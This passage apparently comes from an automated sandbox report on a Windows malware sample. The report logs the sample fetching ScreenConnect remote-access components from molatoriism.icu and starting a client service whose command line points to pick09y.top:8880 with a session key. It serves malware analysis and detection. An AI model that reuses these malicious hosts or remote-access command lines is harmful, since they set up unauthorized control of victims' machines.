                                                                                                                                                                              Data Ascii: * )UUZ(G{soKX )UUZ(I{toLX*0brEp%{s%q44-&+4oM%{t%q55-&+5oM(N*(u*^(u2%} *:(u} *:(u}!*^(u3%}"*:(
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 8c ab 00 00 01 a2 73 3f 02 00 06 a2 25 17 72 1e 07 00 70 1a 8d 9f 00 00 01 25 16 16 73 9e 00 00 0a 8c ac 00 00 01 a2 25 17 17 73 9e 00 00 0a 8c ac 00 00 01 a2 25 18 18 73 9e 00 00 0a 8c ac 00 00 01 a2 25 19 19 73 9e 00 00 0a 8c ac 00 00 01 a2 73 3f 02 00 06 a2 25 18 72 48 07 00 70 19 8d 9f 00 00 01 25 16 1a 73 9f 00 00 0a 8c ad 00 00 01 a2 25 17 1f 0c 73 9f 00 00 0a 8c ad 00 00 01 a2 25 18 1f 24 73 9f 00 00 0a 8c ad 00 00 01 a2 73 3f 02 00 06 a2 25 19 72 88 07 00 70 12 00 fe 15 27 00 00 01 06 8c 27 00 00 01 73 35 02 00 06 a2 2a 00 13 30 06 00 93 00 00 00 14 00 00 11 02 28 a0 00 00 0a 16 6f a1 00 00 0a 02 28 03 00 00 2b 17 fe 01 6f a2 00 00 0a 02 28 a0 00 00 0a 17 6f a1 00 00 0a 02 28 a0 00 00 0a 18 6f a1 00 00 0a 02 28 a0 00 00 0a 19 6f a1 00 00 0a 02 28
                                                                                                                                                                              Data Ascii: s?%rp%s%s%s%ss?%rHp%s%s%$ss?%rp''s5*0(o(+o(o(o(o(
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: cc 00 00 0a 2b 14 03 03 7b cc 00 00 0a 12 09 28 d3 00 00 0a 58 7d cd 00 00 0a 12 09 28 d2 00 00 0a 02 6f d4 00 00 0a 13 0a 12 0a 28 d2 00 00 0a 32 31 04 1a 2e 04 04 1b 33 15 03 03 7b d1 00 00 0a 12 09 28 d2 00 00 0a 59 7d d0 00 00 0a 2a 03 03 7b d0 00 00 0a 12 09 28 d2 00 00 0a 58 7d d1 00 00 0a 2a 00 00 13 30 03 00 a6 00 00 00 19 00 00 11 02 03 04 28 85 04 00 06 0a 02 28 d5 00 00 0a 3a 90 00 00 00 06 1f 0a 33 1f 0f 01 28 cf 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d2 00 00 0a 18 5b 30 03 1f 0d 2a 1f 10 2a 06 1f 0c 33 1f 0f 01 28 cb 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d3 00 00 0a 18 5b 30 03 1f 0d 2a 1f 0e 2a 06 1f 0b 33 1f 0f 01 28 cf 00 00 0a 02 28 d6 00 00 0a 0b 12 01 28 d2 00 00 0a 18 5b 30 03 1f 0e 2a 1f 11 2a 06 1f 0f 33 1f 0f 01 28 cb 00 00 0a 02
                                                                                                                                                                              Data Ascii: +{(X}(o(21.3{(Y}*{(X}*0((:3((([0**3((([0**3((([0**3(
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 2a 22 02 03 7d 32 00 00 04 2a 1e 02 28 f7 00 00 0a 2a 22 02 16 28 57 02 00 06 2a 1e 02 7b 33 00 00 04 2a 22 02 03 7d 33 00 00 04 2a 00 13 30 06 00 2b 02 00 00 1e 00 00 11 03 28 e7 04 00 06 6f 84 00 00 0a 03 18 6f f8 00 00 0a 03 19 6f f9 00 00 0a 7e fa 00 00 0a 72 d0 07 00 70 6f fb 00 00 0a 39 29 01 00 00 7e fa 00 00 0a 72 16 08 00 70 28 fc 00 00 0a 0c 08 39 13 01 00 00 08 6f fd 00 00 0a 6c 08 6f fe 00 00 0a 6c 5b 0d 0e 04 13 04 16 13 05 38 ec 00 00 00 11 04 11 05 a3 21 00 00 01 13 06 09 12 06 28 ff 00 00 0a 6c 12 06 28 00 01 00 0a 6c 5b 32 5f 12 06 28 01 01 00 0a 0f 03 28 cb 00 00 0a 59 12 06 28 02 01 00 0a 0f 03 28 cf 00 00 0a 59 6c 23 00 00 00 00 00 00 e0 3f 12 06 28 00 01 00 0a 6c 12 06 28 ff 00 00 0a 6c 09 5b 59 5a 58 28 03 01 00 0a 12 06 28 ff 00 00
                                                                                                                                                                              Data Ascii: *"}2*(*"(W*{3*"}3*0+(ooo~rpo9)~rp(9olol[8!(l(l[2_((Y((Yl#?(l(l[YZX((
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 17 16 6f 21 01 00 0a 02 73 22 01 00 0a 28 e5 00 00 06 02 72 6e 08 00 70 17 28 23 01 00 0a 7d 49 00 00 04 02 72 90 08 00 70 17 28 23 01 00 0a 73 68 00 00 06 7d 4d 00 00 04 02 7e 98 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 14 07 00 06 73 24 01 00 0a 25 80 98 02 00 04 73 25 01 00 0a 7d 53 00 00 04 02 73 26 01 00 0a 7d 80 00 00 04 02 28 ae 00 00 06 02 fe 06 4f 01 00 06 73 27 01 00 0a 6f 28 01 00 0a 02 73 18 04 00 06 28 b5 00 00 06 02 28 b4 00 00 06 02 fe 06 50 01 00 06 73 29 01 00 0a 6f 2a 01 00 0a 02 28 b4 00 00 06 02 fe 06 51 01 00 06 73 2b 01 00 0a 6f 07 04 00 06 02 02 fe 06 f6 00 00 06 73 2c 01 00 0a 02 fe 06 f8 00 00 06 73 2d 01 00 0a 73 2e 01 00 0a 28 b9 00 00 06 02 02 fe 06 f7 00 00 06 73 2f 01 00 0a 73 07 02 00 06 28 b7 00 00 06 02 28 b6 00 00 06 02
                                                                                                                                                                              Data Ascii: o!s"(rnp(#}Irp(#sh}M~%-&~s$%s%}Ss&}(Os'o(s((Ps)o*(Qs+os,s-s.(s/s((
                                                                                                                                                                              2024-11-07 17:04:47 UTC1369INData Raw: 6f 55 01 00 0a 11 07 6f 23 00 00 0a 2d df de 0c 11 07 2c 07 11 07 6f 22 00 00 0a dc 02 28 e0 00 00 06 28 1c 00 00 2b 6f 56 01 00 0a 13 08 2b 18 11 08 6f 57 01 00 0a 02 fe 06 01 01 00 06 73 1f 01 00 0a 6f 20 01 00 0a 11 08 6f 23 00 00 0a 2d df de 0c 11 08 2c 07 11 08 6f 22 00 00 0a dc 02 18 8d 55 02 00 01 25 16 1f 10 9e 25 17 1f 20 9e 7e 9b 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 17 07 00 06 73 58 01 00 0a 25 80 9b 02 00 04 28 1d 00 00 2b 28 1e 00 00 2b 28 1f 00 00 2b 7d 43 00 00 04 02 73 5a 01 00 0a 7d 44 00 00 04 7e aa 00 00 0a 6f 5b 01 00 0a 0a 06 39 86 00 00 00 02 73 5c 01 00 0a 7d 46 00 00 04 d0 9f 00 00 01 28 bf 00 00 0a 28 5d 01 00 0a 28 20 00 00 2b 13 09 06 18 8d 56 02 00 01 25 16 1f 2c 9d 25 17 1f 3b 9d 6f 5f 01 00 0a 13 0a 16 13 04 2b 40 73 26
                                                                                                                                                                              Data Ascii: oUo#-,o"((+oV+oWso o#-,o"U%% ~%-&~sX%(+(+(+}CsZ}D~o[9s\}F((]( +V%,%;o_+@s&


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              12192.168.2.549808172.67.182.2144437120C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-07 17:04:50 UTC90OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                              Host: molatoriism.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              2024-11-07 17:04:50 UTC769INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 07 Nov 2024 17:04:50 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fgx2iAaPlhDUtbQWTDVq24NbBnQTgr9K2VZf5IGGCOI5hDWxkya8Qb%2FjzqbSbsGhts7jABtAi8ZlRNW9Hg3H69E7ZDcyRTQ8gOGO8yj10NI9obT0j5DPv6QPYgtjdC0BbTk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8deee7993b0f6b04-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1209&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=705&delivery_rate=2264268&cwnd=233&unsent_bytes=0&cid=0b8fdc2acab3794a&ts=306&x=0"
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a fa ad c1 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 ea 72 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 af 44 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00
                                                                                                                                                                              Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$PELz" 0Xr D@
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 00 1b 8c 81 00 00 1b 2d 04 26 14 2b 0b fe 16 81 00 00 1b 6f 43 00 00 0a a2 25 17 02 7b 48 00 00 0a 0b 12 01 25 71 82 00 00 1b 8c 82 00 00 1b 2d 04 26 14 2b 0b fe 16 82 00 00 1b 6f 43 00 00 0a a2 28 44 00 00 0a 2a 1e 02 7b 49 00 00 0a 2a 1e 02 7b 4a 00 00 0a 2a 56 02 28 3c 00 00 0a 02 03 7d 49 00 00 0a 02 04 7d 4a 00 00 0a 2a 13 30 03 00 41 00 00 00 05 00 00 11 03 75 85 00 00 1b 0a 02 06 2e 34 06 2c 2f 28 3d 00 00 0a 02 7b 49 00 00 0a 06 7b 49 00 00 0a 6f 3e 00 00 0a 2c 17 28 3f 00 00 0a 02 7b 4a 00 00 0a 06 7b 4a 00 00 0a 6f 40 00 00 0a 2a 16 2a 17 2a d2 20 c8 c1 c2 7a 20 29 55 55 a5 5a 28 3d 00 00 0a 02 7b 49 00 00 0a 6f 41 00 00 0a 58 20 29 55 55 a5 5a 28 3f 00 00 0a 02 7b 4a 00 00 0a 6f 42 00 00 0a 58 2a 00 00 13 30 07 00 62 00 00 00 02 00 00 11 14 72
                                                                                                                                                                              Data Ascii: -&+oC%{H%q-&+oC(D*{I*{J*V(<}I}J*0Au.4,/(={I{Io>,(?{J{Jo@*** z )UUZ(={IoAX )UUZ(?{JoBX*0br
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 72 0c 02 00 70 72 26 02 00 70 73 71 00 00 0a 7a 13 30 03 00 35 00 00 00 08 00 00 11 28 72 00 00 0a 02 7b 6d 00 00 0a 03 7b 6d 00 00 0a 6f 73 00 00 0a 0a 06 2c 02 06 2a 28 74 00 00 0a 02 7b 6e 00 00 0a 03 7b 6e 00 00 0a 6f 75 00 00 0a 0a 06 2a 00 00 00 13 30 02 00 19 00 00 00 07 00 00 11 03 75 95 00 00 1b 2c 0f 03 a5 95 00 00 1b 0a 02 06 28 6f 00 00 0a 2a 16 2a 00 00 00 13 30 02 00 24 00 00 00 09 00 00 11 7f d3 01 00 04 02 7b 6d 00 00 0a 28 02 00 00 2b 0a 12 00 02 7b 6e 00 00 0a 28 03 00 00 2b 28 2c 06 00 06 2a 86 72 2e 02 00 70 02 7b 6d 00 00 0a 8c 81 00 00 1b 02 7b 6e 00 00 0a 8c 82 00 00 1b 28 76 00 00 0a 2a 5a 02 03 7d 77 00 00 0a 02 04 7d 78 00 00 0a 02 05 7d 79 00 00 0a 2a 26 0f 00 03 28 7a 00 00 0a 2a 32 0f 00 03 28 7a 00 00 0a 16 fe 01 2a 32 0f 00
                                                                                                                                                                              Data Ascii: rpr&psqz05(r{m{mos,*(t{n{nou*0u,(o**0${m(+{n(+(,*r.p{m{n(v*Z}w}x}y*&(z*2(z*2
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 00 03 28 92 00 00 0a 16 fe 04 2a 32 0f 00 03 28 92 00 00 0a 16 fe 02 2a 3e 0f 00 03 28 92 00 00 0a 16 fe 02 16 fe 01 2a 3e 0f 00 03 28 92 00 00 0a 16 fe 04 16 fe 01 2a 00 00 00 13 30 03 00 79 00 00 00 00 00 00 00 28 3d 00 00 0a 02 7b 8c 00 00 0a 03 7b 8c 00 00 0a 6f 3e 00 00 0a 2c 5f 28 3f 00 00 0a 02 7b 8d 00 00 0a 03 7b 8d 00 00 0a 6f 40 00 00 0a 2c 47 28 7c 00 00 0a 02 7b 8e 00 00 0a 03 7b 8e 00 00 0a 6f 7d 00 00 0a 2c 2f 28 87 00 00 0a 02 7b 8f 00 00 0a 03 7b 8f 00 00 0a 6f 88 00 00 0a 2c 17 28 93 00 00 0a 02 7b 90 00 00 0a 03 7b 90 00 00 0a 6f 94 00 00 0a 2a 16 2a 00 00 00 13 30 02 00 2c 00 00 00 0c 00 00 11 03 2d 02 17 2a 03 75 a0 00 00 1b 2c 0f 03 a5 a0 00 00 1b 0a 02 06 28 92 00 00 0a 2a 72 0c 02 00 70 72 26 02 00 70 73 71 00 00 0a 7a 13 30 03 00
                                                                                                                                                                              Data Ascii: (*2(*>(*>(*0y(={{o>,_(?{{o@,G(|{{o},/({{o,({{o**0,-*u,(*rpr&psqz0
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 19 02 7b 9a 00 00 0a 8c 9f 00 00 1b a2 25 1a 02 7b 9b 00 00 0a 8c a3 00 00 1b a2 25 1b 02 7b 9c 00 00 0a 8c a7 00 00 1b a2 28 8b 00 00 0a 2a da 02 03 7d a3 00 00 0a 02 04 7d a4 00 00 0a 02 05 7d a5 00 00 0a 02 0e 04 7d a6 00 00 0a 02 0e 05 7d a7 00 00 0a 02 0e 06 7d a8 00 00 0a 02 0e 07 7d a9 00 00 0a 2a 26 0f 00 03 28 aa 00 00 0a 2a 32 0f 00 03 28 aa 00 00 0a 16 fe 01 2a 32 0f 00 03 28 ab 00 00 0a 16 fe 04 2a 32 0f 00 03 28 ab 00 00 0a 16 fe 02 2a 3e 0f 00 03 28 ab 00 00 0a 16 fe 02 16 fe 01 2a 3e 0f 00 03 28 ab 00 00 0a 16 fe 04 16 fe 01 2a 00 00 00 13 30 03 00 ac 00 00 00 00 00 00 00 28 3d 00 00 0a 02 7b a3 00 00 0a 03 7b a3 00 00 0a 6f 3e 00 00 0a 39 8f 00 00 00 28 3f 00 00 0a 02 7b a4 00 00 0a 03 7b a4 00 00 0a 6f 40 00 00 0a 2c 77 28 7c 00 00 0a 02
                                                                                                                                                                              Data Ascii: {%{%{(*}}}}}}}*&(*2(*2(*2(*>(*>(*0(={{o>9(?{{o@,w(|
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 6f c6 00 00 0a 16 31 2e 06 16 6f c7 00 00 0a 2a 02 6f c8 00 00 0a 0b 2b 09 07 6f c9 00 00 0a 0c de 1e 07 6f 11 00 00 0a 2d ef de 0a 07 2c 06 07 6f 10 00 00 0a dc 12 03 fe 15 8e 00 00 1b 09 2a 08 2a 00 00 00 01 10 00 00 02 00 22 00 15 37 00 0a 00 00 00 00 1b 30 02 00 3d 00 00 00 10 00 00 11 02 6f c8 00 00 0a 0a 2b 14 06 6f c9 00 00 0a 0b 03 07 6f ca 00 00 0a 2c 04 07 0c de 1e 06 6f 11 00 00 0a 2d e4 de 0a 06 2c 06 06 6f 10 00 00 0a dc 12 03 fe 15 8e 00 00 1b 09 2a 08 2a 00 00 00 01 10 00 00 02 00 07 00 20 27 00 0a 00 00 00 00 1e 02 73 cb 00 00 0a 2a 13 30 03 00 48 00 00 00 11 00 00 11 73 cc 00 00 0a 0a 06 02 75 b3 00 00 1b 7d cd 00 00 0a 06 7b cd 00 00 0a 2d 0c 02 73 cb 00 00 0a 28 ce 00 00 0a 2a 06 7b cd 00 00 0a 6f c6 00 00 0a 8d 8e 00 00 1b 06 fe 06 cf
                                                                                                                                                                              Data Ascii: o1.o*o+oo-,o**"70=o+oo,o-,o** 's*0Hsu}{-s(*{o
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 00 0a 2a 02 6f c8 00 00 0a 0b 2b 09 07 6f c9 00 00 0a 0c de 1a 07 6f 11 00 00 0a 2d ef de 0a 07 2c 06 07 6f 10 00 00 0a dc 73 02 01 00 0a 7a 08 2a 00 00 00 01 10 00 00 02 00 22 00 15 37 00 0a 00 00 00 00 1b 30 02 00 39 00 00 00 1d 00 00 11 02 6f c8 00 00 0a 0a 2b 14 06 6f c9 00 00 0a 0b 03 07 6f ca 00 00 0a 2c 04 07 0c de 1a 06 6f 11 00 00 0a 2d e4 de 0a 06 2c 06 06 6f 10 00 00 0a dc 73 02 01 00 0a 7a 08 2a 00 00 00 01 10 00 00 02 00 07 00 20 27 00 0a 00 00 00 00 1b 30 02 00 74 00 00 00 0f 00 00 11 02 75 2a 00 00 1b 0a 06 2c 24 06 6f c6 00 00 0a 2d 0b 72 48 03 00 70 73 03 01 00 0a 7a 06 6f c6 00 00 0a 17 33 41 06 16 6f c7 00 00 0a 2a 02 6f c8 00 00 0a 0b 07 6f 11 00 00 0a 2d 0b 72 48 03 00 70 73 03 01 00 0a 7a 07 6f c9 00 00 0a 0c 07 6f 11 00 00 0a 2d 04
                                                                                                                                                                              Data Ascii: *o+oo-,osz*"709o+oo,o-,osz* '0tu*,$o-rHpszo3Ao*oo-rHpszoo-
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 01 16 fe 01 2a 32 02 7b 0f 01 00 0a 6f 15 01 00 0a 2a 36 02 7b 0f 01 00 0a 03 6f 16 01 00 0a 2a 00 00 00 13 30 03 00 20 00 00 00 25 00 00 11 73 17 01 00 0a 0a 06 03 7d 18 01 00 0a 02 06 fe 06 19 01 00 0a 73 1a 01 00 0a 28 0f 00 00 2b 2a 1b 30 02 00 35 00 00 00 26 00 00 11 03 6f 15 00 00 0a 0a 2b 14 06 6f 12 00 00 0a 0b 02 07 28 1b 01 00 0a 2c 04 17 0c de 16 06 6f 11 00 00 0a 2d e4 de 0a 06 2c 06 06 6f 10 00 00 0a dc 16 2a 08 2a 00 00 00 01 10 00 00 02 00 07 00 20 27 00 0a 00 00 00 00 4e 02 7b 0f 01 00 0a 6f 1c 01 00 0a 03 04 6f 1d 01 00 0a 2a 32 02 7b 0f 01 00 0a 6f 14 01 00 0a 2a 0a 16 2a 36 02 7b 0f 01 00 0a 03 6f 13 01 00 0a 2a 5a 02 7b 0f 01 00 0a 6f 1c 01 00 0a 6f 1e 01 00 0a 8c da 00 00 1b 2a 5a 02 7b 0f 01 00 0a 6f 1c 01 00 0a 6f 1e 01 00 0a 8c da
                                                                                                                                                                              Data Ascii: *2{o*6{o*0 %s}s(+*05&o+o(,o-,o** 'N{oo*2{o**6{o*Z{oo*Z{oo
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 36 00 00 04 0a 06 28 2c 01 00 0a 02 7b 38 00 00 04 25 2d 03 26 de 10 03 6f 35 01 00 0a 26 de 07 06 28 2d 01 00 0a dc 2a 00 00 01 10 00 00 02 00 0d 00 15 22 00 07 00 00 00 00 72 18 8d 38 00 00 02 25 16 02 a4 38 00 00 02 25 17 03 a4 38 00 00 02 28 46 01 00 06 2a 1e 02 73 3e 01 00 06 2a 00 00 00 1b 30 02 00 33 00 00 00 2a 00 00 11 02 7b 36 00 00 04 0a 06 28 2c 01 00 0a 02 7b 39 00 00 04 28 15 00 00 2b 02 7b 3a 00 00 04 25 2d 03 26 de 0e 28 16 04 00 06 de 07 06 28 2d 01 00 0a dc 2a 00 01 10 00 00 02 00 0d 00 1e 2b 00 07 00 00 00 00 52 0f 01 02 fe 06 22 02 00 06 73 31 00 00 06 28 2a 01 00 06 2a 1e 02 28 4d 00 00 0a 2a 3a 02 03 7d 3b 00 00 04 02 28 4d 00 00 0a 2a 1e 02 7b 3b 00 00 04 2a 22 02 03 7d 3b 00 00 04 2a 1e 02 28 4d 00 00 0a 2a 3a 02 03 7d 3c 00 00 04
                                                                                                                                                                              Data Ascii: 6(,{8%-&o5&(-*"r8%8%8(F*s>*03*{6(,{9(+{:%-&((-*+R"s1(**(M*:};(M*{;*"};*(M*:}<
                                                                                                                                                                              2024-11-07 17:04:50 UTC1369INData Raw: 28 74 01 00 06 28 09 09 00 06 06 2a 1e 02 28 4d 00 00 0a 2a 3a 02 28 4d 00 00 0a 02 03 28 7a 01 00 06 2a 1e 02 7b 52 00 00 04 2a 22 02 03 7d 52 00 00 04 2a 32 02 72 38 04 00 70 28 78 01 00 06 2a 1e 02 28 4d 00 00 0a 2a 1e 02 28 4d 00 00 0a 2a 1e 02 28 4d 00 00 0a 2a 1e 02 28 4d 00 00 0a 2a 3a 02 28 4d 00 00 0a 02 03 7d 53 00 00 04 2a 1e 02 7b 53 00 00 04 2a 3a 02 28 4d 00 00 0a 02 03 7d 54 00 00 04 2a 1e 02 7b 54 00 00 04 2a 1e 02 28 4d 00 00 0a 2a 1e 02 28 4d 00 00 0a 2a 3a 02 28 4d 00 00 0a 02 03 7d 55 00 00 04 2a 1e 02 7b 55 00 00 04 2a 26 02 03 16 28 89 01 00 06 2a 56 02 28 4d 00 00 0a 02 03 7d 56 00 00 04 02 04 7d 57 00 00 04 2a 1e 02 7b 56 00 00 04 2a 1e 02 7b 57 00 00 04 2a 22 02 17 28 8d 01 00 06 2a 3a 02 28 4d 00 00 0a 02 03 7d 58 00 00 04 2a 1e
                                                                                                                                                                              Data Ascii: (t(*(M*:(M(z*{R*"}R*2r8p(x*(M*(M*(M*(M*:(M}S*{S*:(M}T*{T*(M*(M*:(M}U*{U*&(*V(M}V}W*{V*{W*"(*:(M}X*


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:12:04:10
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\Desktop\pzPO97QouM.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\pzPO97QouM.exe"
                                                                                                                                                                              Imagebase:0xf50000
                                                                                                                                                                              File size:83'336 bytes
                                                                                                                                                                              MD5 hash:47891CF8A43A19E066FE70E812982C98
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:12:04:10
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                                                                                                                                                                              Imagebase:0x2356cff0000
                                                                                                                                                                              File size:24'856 bytes
                                                                                                                                                                              MD5 hash:B4088F44B80D363902E11F897A7BAC09
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:12:04:18
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:12:04:52
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                                                                                                                                                                              Imagebase:0xdd0000
                                                                                                                                                                              File size:601'376 bytes
                                                                                                                                                                              MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:12:04:53
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                                                                                                                                                                              Imagebase:0x80000
                                                                                                                                                                              File size:95'520 bytes
                                                                                                                                                                              MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:7
                                                                                                                                                                              Start time:12:04:53
                                                                                                                                                                              Start date:07/11/2024
                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe
                                                                                                                                                                              Wow64 process (32bit):true
